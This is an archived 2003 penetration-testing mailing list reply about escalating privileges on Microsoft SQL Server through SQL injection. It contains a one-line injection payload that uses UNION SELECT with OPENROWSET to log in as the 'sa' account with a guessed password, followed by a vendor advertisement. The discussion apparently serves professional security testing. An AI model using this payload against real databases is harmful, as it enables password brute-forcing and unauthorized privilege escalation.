Penetration Testing mailing list archives
Re: Brute forcing a M$ SQL Server password through SQL Injection
From: "David Litchfield" <mnemonix () globalnet co uk>
Date: Wed, 19 Feb 2003 23:22:06 -0800
.....The goal is to elevate priviledges.
How would you achieve this? ...
You need to take a look at OPENROWSET:
' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'testpass','SELECT @@version')--
Adhoc queries need to be enabled, though.
HTH,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
----------------------------------------------------------------------------
Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
http://www.securityfocus.com/core
Current thread:
- Brute forcing a M$ SQL Server password through SQL Injection Roman Medina (Feb 19)
- Re: Brute forcing a M$ SQL Server password through SQL Injection David Litchfield (Feb 19)
- Re: Brute forcing a M$ SQL Server password through SQL Injection Roman Medina (Feb 19)
- Re: Brute forcing a M$ SQL Server password through SQL Injection Roman Medina (Feb 22)
- Re: Brute forcing a M$ SQL Server password through SQL Injection David Litchfield (Feb 19)